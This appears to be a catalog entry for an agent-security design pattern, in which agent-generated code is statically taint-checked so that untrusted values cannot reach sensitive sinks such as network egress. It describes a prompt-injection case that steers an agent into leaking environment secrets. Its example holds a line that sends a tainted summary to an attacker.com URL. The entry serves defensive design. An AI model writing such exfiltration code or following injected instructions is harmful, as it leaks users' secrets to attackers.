Code-Then-Execute with Dataflow Analysis

Also known as: Tainted-Value Code Execution, Sandbox-DSL with Provenance

Have the agent emit code in a sandbox DSL whose values are statically tagged trusted/tainted via dataflow analysis before execution, enabling per-value policy enforcement.

Context

An agent solves complex tasks by generating code that the runtime executes — data extraction, multi-step computations, tool chains. Some inputs to the code come from untrusted sources (user input, fetched content, tool outputs from third-party APIs).

Problem

Without provenance tracking, the executor cannot distinguish trusted values (the agent's plan, the user's goal) from tainted values (fetched content that could be attacker-controlled); the same `exec(code)` call runs both. A prompt injection in fetched content can steer the agent into producing code that, for example, reads secrets from the environment and embeds them in an outbound URL. The sandbox cannot reject that code, because it has no way to tell that the URL carries tainted data.

Forces

Free-form code generation is the agent's primary capability.
Static dataflow analysis on generated code constrains expressivity.
Tagging every value as trusted/tainted requires the DSL to track provenance.

Example

A research agent generates code: `summary = summarize(fetch('https://...'))`. The fetched content is TAINTED, and so is `summary`, which is derived from it. The agent then writes `requests.get(f'https://attacker.com?d={summary}')`. Dataflow analysis sees a TAINTED value flowing into network egress and rejects the program before execution. Without the analysis, the sandbox would have allowed the egress, because outbound HTTPS is permitted.
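The check in this example can be sketched with Python's standard `ast` module. This is a minimal illustration, not the catalog's reference implementation: it assumes the DSL is a straight-line subset of Python, and the policy sets `TAINT_SOURCES` and `SENSITIVE_SINKS` as well as the helper names are hypothetical. It only parses the program text and never executes it.

```python
import ast

# Hypothetical policy for this sketch; a real DSL would declare its own.
TAINT_SOURCES = {"fetch"}           # calls whose results may be attacker-controlled
SENSITIVE_SINKS = {"requests.get"}  # calls that perform network egress


def call_name(node: ast.Call) -> str:
    """Return the dotted name of a call, e.g. 'requests.get'."""
    return ast.unparse(node.func)


def is_tainted(node: ast.AST, tainted_vars: set[str]) -> bool:
    """True if the expression contains a taint source or a tainted variable."""
    for sub in ast.walk(node):
        if isinstance(sub, ast.Name) and sub.id in tainted_vars:
            return True
        if isinstance(sub, ast.Call) and call_name(sub) in TAINT_SOURCES:
            return True
    return False


def find_violations(source: str) -> list[str]:
    """Scan straight-line code and report tainted values that reach a sink."""
    tainted_vars: set[str] = set()
    violations: list[str] = []
    for stmt in ast.parse(source).body:
        # Check every sink call in the statement against the taint known so far.
        for sub in ast.walk(stmt):
            if isinstance(sub, ast.Call) and call_name(sub) in SENSITIVE_SINKS:
                args = list(sub.args) + [kw.value for kw in sub.keywords]
                if any(is_tainted(arg, tainted_vars) for arg in args):
                    violations.append(
                        f"line {stmt.lineno}: tainted value reaches {call_name(sub)}"
                    )
        # Propagate taint through simple `name = expr` assignments.
        if isinstance(stmt, ast.Assign):
            value_tainted = is_tainted(stmt.value, tainted_vars)
            for target in stmt.targets:
                if isinstance(target, ast.Name):
                    if value_tainted:
                        tainted_vars.add(target.id)
                    else:
                        tainted_vars.discard(target.id)
    return violations


program = (
    "summary = summarize(fetch('https://...'))\n"
    "requests.get(f'https://attacker.com?d={summary}')\n"
)
print(find_violations(program))
# ['line 2: tainted value reaches requests.get']
```

The sketch ignores branches, loops, attribute and container writes, and aliasing. A production analysis would need to handle those conservatively, which is one concrete form of the expressivity cost listed under Forces.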

Diagram

flowchart TD
    Agent[Agent emits DSL program] --> Tag[Values tagged TRUSTED/TAINTED]
    Tag --> DFA[Static dataflow analysis]
    DFA -->|tainted reaches sink| Reject[Reject before execution]
    DFA -->|safe| Sandbox[Execute in sandbox]

Solution

Therefore:

Define a sandbox DSL (a subset of Python or TypeScript, or a custom Pyret-style language) where every value carries a provenance tag (TRUSTED, TAINTED, MIXED). The runtime performs static dataflow analysis on each agent-generated program before execution: if a TAINTED value reaches a sink declared sensitive (network egress, env reads, file writes outside the scratch dir), reject the program. Pair with sandbox-isolation and action-selector-pattern.
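One way to model the three tags and a per-sink policy is sketched below. The pattern text does not specify how tags combine or how MIXED is treated at a sink, so two assumptions are made here: combining values with different tags yields MIXED, and sensitive sinks accept only TRUSTED values. The sink names in `SINK_POLICY` and the helper names are hypothetical.

```python
from enum import Enum


class Tag(Enum):
    TRUSTED = "trusted"
    TAINTED = "tainted"
    MIXED = "mixed"


def join(a: Tag, b: Tag) -> Tag:
    """Provenance of a value built from two operands (assumed semantics)."""
    # Same tag on both sides is preserved; any disagreement becomes MIXED.
    return a if a is b else Tag.MIXED


# Hypothetical policy table: the tags each sensitive sink will accept.
SINK_POLICY = {
    "network_egress": {Tag.TRUSTED},
    "env_read": {Tag.TRUSTED},
    "file_write_outside_scratch": {Tag.TRUSTED},
}


def allowed(sink: str, tag: Tag) -> bool:
    """Sinks not declared sensitive accept any tag."""
    accepted = SINK_POLICY.get(sink)
    return accepted is None or tag in accepted


# A URL built from a trusted prefix and a tainted summary is MIXED,
# so under this conservative policy it may not reach network egress.
url_tag = join(Tag.TRUSTED, Tag.TAINTED)
print(url_tag.name, allowed("network_egress", url_tag))
# MIXED False
```

Treating MIXED like TAINTED at sensitive sinks is the conservative choice; a looser policy could add MIXED to the accepted set for selected sinks.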

What this pattern forbids. The runtime may not execute agent-generated code without first running dataflow analysis; programs whose taint reaches a sensitive sink are rejected, not sanitized.
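The rule above amounts to a gate in front of the executor. A minimal sketch, assuming the analysis is available as a function that returns a list of violation messages; `run_checked`, `TaintViolation`, and both callback parameters are hypothetical names introduced for illustration:

```python
from typing import Callable


class TaintViolation(Exception):
    """Raised when analysis finds tainted data reaching a sensitive sink."""


def run_checked(
    source: str,
    analyze: Callable[[str], list[str]],
    execute: Callable[[str], object],
) -> object:
    """Run `execute` only if `analyze` reports no violations for `source`."""
    violations = analyze(source)
    if violations:
        # Reject the whole program; do not attempt to rewrite or sanitize it.
        raise TaintViolation("; ".join(violations))
    return execute(source)
```

Keeping the analysis and the sandboxed executor behind one entry point makes it harder for a caller to reach the executor without the check.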

And the patterns that stand alongside it, or against it:

complements Sandbox Isolation ★★: Run agent-emitted code or actions in a contained environment with restricted filesystem, network, and process privileges.
complements Code-as-Action Agent ★: Have the agent emit a code snippet as its action each step, executed in a constrained interpreter, instead of emitting JSON tool calls; tool composition becomes function nesting and control flow inside the snippet.
complements Code Execution ★★: Let the model emit code, run it in a sandbox, and treat the run as the answer instead of trusting the model to compute in its head.
complements Action Selector Pattern ★: Eliminate the feedback channel from tool outputs back into the agent's reasoning step by having the agent select actions from a fixed catalog rather than free-form generation over tool output.
complements Tool Output Poisoning Defense ★: Treat tool output as untrusted content and apply instruction-stripping plus per-tool trust labels.

Provenance

Source: patterns/code-then-execute-with-dataflow.md on GitHub · commit 0f962e5
Added to catalog: 2026-05-23
Last updated: 2026-05-23
Contribute: open an issue or PR at github.com/agentpatternscatalog/patterns.